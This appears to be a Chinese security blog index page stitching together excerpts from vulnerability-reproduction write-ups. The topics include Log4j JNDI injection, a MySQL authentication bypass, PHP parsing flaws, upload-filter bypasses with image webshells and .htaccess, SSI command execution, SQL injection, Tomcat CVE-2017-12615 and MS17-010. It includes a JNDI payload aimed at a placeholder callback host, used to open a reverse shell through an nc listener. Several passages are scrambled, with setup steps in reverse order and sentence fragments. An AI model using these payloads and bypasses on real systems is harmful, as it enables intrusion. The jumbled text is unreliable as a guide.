qq_51331767的博客

在其2.0到2.14.1版本中存在一处JNDI注入漏洞，log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息，其中包含一个恶意的Java对象，当log4j尝试解析这个对象时，它将会触发漏洞，导致攻击者能够执行任意代码。通过DNSLog平台（http://www.dnslog.cn/）获取到域名http://xxxxxx，构造payload ${jndi:ldap://http://xxxxxx}这里IP是kali的IP，端口是你等会nc监听的端口。JNDI注入反弹shell。

当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。我们可以使用Meterpreter中的模块或者使用特殊的SQL语句进行身份绕过登录，出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值，在某些平台上进行了优化，导致即便是memcmp()返回一个非零值，也会使MySQL认为两个密码是相同的。爆破多次即绕过身份验证，成功登录数据库，复现成功。2、访问3306端口查看环境。

由于用户的配置问题，在php的配置文件中cgi.fix_pathinfo默认开启，当url中有不存在的文件，php会向前递归，将../.jpg/.php解析为/.php文件。将php-fpm.conf中的 security.limit_extensions =.php，只支持php后缀解析。http://IP/uploadfiles/图片.jpg/.php。在文件路径后加上.php，在进行访问，发现php代码已经被执行。访问http://IP/，看到这个页面表示漏洞环境搭建成功。访问文件的路径，正常访问。

NTFS储存数据流的一个属性，这样我们去访问的时候，我们请求的会被它认为是 phpinfo.php 本身的数据。有时会直接检测你上传的文件，如果你上传了上面规定的文件，他会把你的后缀名去掉，但是他只会过滤一次，这时我们可以用双写进行绕过，只要写两个php就行了，pphphp将php过滤后还剩下php，即可上传成功。然后我们就可以先上传一个.jpg的图片马，然后再上传.htaccess的文件，然后在有.htaccess的文件夹内.jpg就会被解析为.php的文件，然后上传的图片马就可以发挥作用了。

3、将下载的压缩包解压到phpstudy文件，phpstudy/www网站的根目录下。运行镜像docker run -d -p 90:80 cuer/upload-labs。4、本地浏览器访问127.0.0.1/upload-labs/就可以访问靶场了。2、然后到GitHub去下载upload-labs的源码。1、首先安装phpstudy的环境，下载进行安装。将upload-labs镜像拉取到本地仓库。在镜像仓库搜索upload-labs镜像。查看本地镜像，如图下载成功。

访问http://139.9.66.23:8080/upload.php,可以看到一个上传页面。的基于服务器的网页制作技术。文件的默认扩展名是.stm、.shtm和.shtml。如果目标服务器开启了SSI和CGI支持，我们就可以上传shtml的文件，利用。访问一下我们上传的文件，看到如下图的代码，即说明存在远程命令执行漏洞。运行一个支持SSI和CGI的apache服务器。上传一个php的文件，提示上传的文件类型不支持。创建一个shell.shtml文件，内容如下。上传shell.shtml文件，上传成功。

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。在原来的sql语句中插入payload，攻击者注入一段包含注释符的sql语句，将原来的语句的一部分注释，注释掉的部分语句不会被执行。即把sql命令插入到web的请求表单中，欺骗服务器，以此来获取服务器的数据和权限。把用户输入的数据当作代码执行。

2017年9月19日，Apache Tomcat官方确认并修复了两个高危漏洞，漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中远程代码执行漏洞（CVE-2017-12615）。一定条件下，攻击者可以利用该漏洞，通过上传的jsp文件，在服务器上执行任意代码，导致数据泄露或权限被获取，存在高安全风险。

Windows下的MS17-010（永恒之蓝）的复现与分析